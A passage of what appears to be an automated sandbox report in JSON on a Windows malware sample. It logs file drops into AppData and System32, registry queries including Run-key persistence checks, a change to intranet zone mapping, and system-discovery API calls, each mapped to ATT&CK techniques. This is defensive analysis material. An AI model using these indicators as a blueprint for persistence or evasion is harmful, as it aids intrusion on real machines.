file \"C:\\version.DLL\"\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" trying to access non-existent file \"C:\\VERSION.DLL\"\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"\n \"ewiuer2.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\version.DLL\"\n \"ewiuer2.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Secur32.dll\"\n \"ewiuer2.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\SSPICLI.DLL\"\n \"ewiuer2.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\api-ms-win-downlevel-advapi32-l2-1-0.dll\"\n \"ewiuer2.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\FLTLIB.DLL\"\n \"ewiuer2.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"ewiuer2.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" reads file \"c:\\6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\"\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" reads file \"c:\\users\\%osuser%\\appdata\\roaming\\ewiuer2.exe\"\n \"ewiuer2.exe\" reads file \"c:\\users\\%osuser%\\appdata\\roaming\\ewiuer2.exe\"\n \"ewiuer2.exe\" reads file \"c:\\windows\\system32\\ewiuer2.exe\"\n \"ewiuer2.exe\" reads file \"c:\\windows\\system32\\viesazm.mpk\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"\"; Value: \"\")\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\\MACHINELANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\MUI\\SETTINGS\"; Key: \"\"; Value: \"\")\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\CONTROL PANEL\\DESKTOP\"; Key: \"\"; Value: \"\")\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\LANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"\"; Value: \"\")\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"\"; Value: \"\")\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"\"; Value: \"\")\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SRP\\GP\\DLL\"; Key: \"\"; Value: \"\")\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"ewiuer2.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"ewiuer2.exe\" touched file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"ewiuer2.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\counters.dat\"\n \"ewiuer2.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\"\n \"ewiuer2.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\"\n \"ewiuer2.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\History\"\n \"ewiuer2.exe\" touched file \"C:\\Windows\\System32\\ewiuer2.exe\"\n \"ewiuer2.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\\counters.dat\"\n \"ewiuer2.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files\"\n \"ewiuer2.exe\" touched file \"%APPDATA%\\Microsoft\\Windows\\Cookies\"\n \"ewiuer2.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\History\"\n \"ewiuer2.exe\" touched file \"C:\\Windows\\System32\\viesazm.mpk\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"PREFERREDUILANGUAGES\"; Value: \"\")\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"MACHINEPREFERREDUILANGUAGES\"; Value: \"\")\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSAPPCOMPAT\"; Value: \"\")\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSUSERENABLED\"; Value: \"\")\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"DISABLEMETAFILES\"; Value: \"\")\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"6C44F12613FC720B7520A01590D950C8C0D8BB3E90284FDEE076D3B5D64AB0D2\"; Value: \"\")\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"LOADAPPINIT_DLLS\"; Value: \"\")\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORUSESYSTEMHEAP\"; Value: \"\")\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORSYSTEMHEAPISPRIVATE\"; Value: \"\")\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"TASKHOST\"; Value: \"\")\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"TASKHOST\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" trying to touch file \"C:\\version.DLL\"\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" trying to touch file \"C:\\Windows\\system32\\version.DLL\"\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\ewiuer2.exe\"\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" trying to touch file \"C:\\Windows\\system32\\apphelp.dll\"\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" trying to touch file \"C:\\Windows\\AppPatch\\sysmain.sdb\"\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" trying to touch file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\ui\\SwDRM.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" writes file \"c:\\users\\%osuser%\\appdata\\roaming\\ewiuer2.exe\"\n \"ewiuer2.exe\" writes file \"c:\\windows\\system32\\ewiuer2.exe\"\n \"ewiuer2.exe\" writes file \"c:\\windows\\system32\\viesazm.mpk\"\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" writes file \"%appdata%\\ewiuer2.exe\"\n \"ewiuer2.exe\" writes file \"%windir%\\system32\\viesazm.mpk\"\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" writes file \"%windir%\\system32\\ewiuer2.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"ewiuer2.exe\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"ewiuer2.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\viesazm.mpk\"\n \"ewiuer2.exe\" trying to access non-existent file \"\\Device\\RasAcd\"\n \"ewiuer2.exe\" trying to access non-existent file \"\\Device\\NetBT_Tcpip_{90A066FE-591C-47F3-850D-9644B684FBA5}\"\n \"ewiuer2.exe\" trying to access non-existent file \"\\Device\\NetBT_Tcpip6_{AC07BF4D-B150-47EB-A71E-488912826651}\"\n \"ewiuer2.exe\" trying to access non-existent file \"\\Device\\NetBT_Tcpip6_{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"\n \"ewiuer2.exe\" trying to access non-existent file \"\\Device\\NetBT_Tcpip6_{90A066FE-591C-47F3-850D-9644B684FBA5}\"\n \"ewiuer2.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\ewiuer2.exe.Local\\\"\n \"ewiuer2.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\VIESAZM.MPK\"\n \"ewiuer2.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\EWIUER2.EXE.LOCAL\"\n \"ewiuer2.exe\" trying to access non-existent file \"C:\\Windows\\System32\\viesazm.mpk\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"ewiuer2.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%APPDATA%\\ewiuer2.exe]- [targetUID: 00000000-00005716]\n \"EWIUER2.EXE.67A4889D.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"viesazm.mpk\" has type \"data\"- Location: [%WINDIR%\\System32\\viesazm.mpk]- [targetUID: 00000000-00003644]\n \"ewiuer2.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%WINDIR%\\System32\\ewiuer2.exe]- [targetUID: 00000000-00005716]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "registry-179", "type": 3, "relevance": 1, "name": "Tries to map intranet network resources to internet zone", "description": "\"ewiuer2.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"UNCASINTRANET\"; Value: \"00000000\")", "origin": "Registry Access", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"ewiuer2.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00003644)\n \"ewiuer2.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00003644)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"ewiuer2.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00003644)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-148", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve account information for specified SID", "description": "\"ewiuer2.exe\" called \"LookupAccountSidW\" with param Name %OSUSER% (UID: 00000000-00005912)\n \"ewiuer2.exe\" called \"LookupAccountSidW\" with param Name %OSUSER% (UID: 00000000-00006088)\n \"ewiuer2.exe\" called \"LookupAccountSidW\" with param Name %OSUSER% (UID: 00000000-00003644)", "origin": "API Call", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-130", "type": 3, "relevance": 1, "name": "Queries TCP/IP interface details", "description": "\"ewiuer2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"ENABLEDHCP\"; Value: \"\")\n \"ewiuer2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"REGISTRATIONENABLED\"; Value: \"\")\n \"ewiuer2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"REGISTERADAPTERNAME\"; Value: \"\")\n \"ewiuer2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"DOMAIN\"; Value: \"\")\n \"ewiuer2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"DHCPDOMAIN\"; Value: \"\")\n \"ewiuer2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"ENABLEDHCP\"; Value: \"\")\n \"ewiuer2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"REGISTRATIONENABLED\"; Value: \"\")\n \"ewiuer2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"REGISTERADAPTERNAME\"; Value: \"\")\n \"ewiuer2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"DOMAIN\"; Value: \"\")\n \"ewiuer2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"DHCPDOMAIN\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-1", "type": 3, "relevance": 5, "name": "Reads the cryptographic machine GUID", "description": "\"ewiuer2.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\CRYPTOGRAPHY\"; Key: \"MACHINEGUID\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005716)\n \"6c44f12613fc720b7520a01590d950c8c0d8bb3e90284fdee076d3b5d64ab0d2.exe\" called \"RtlGetVersion\" with parameter 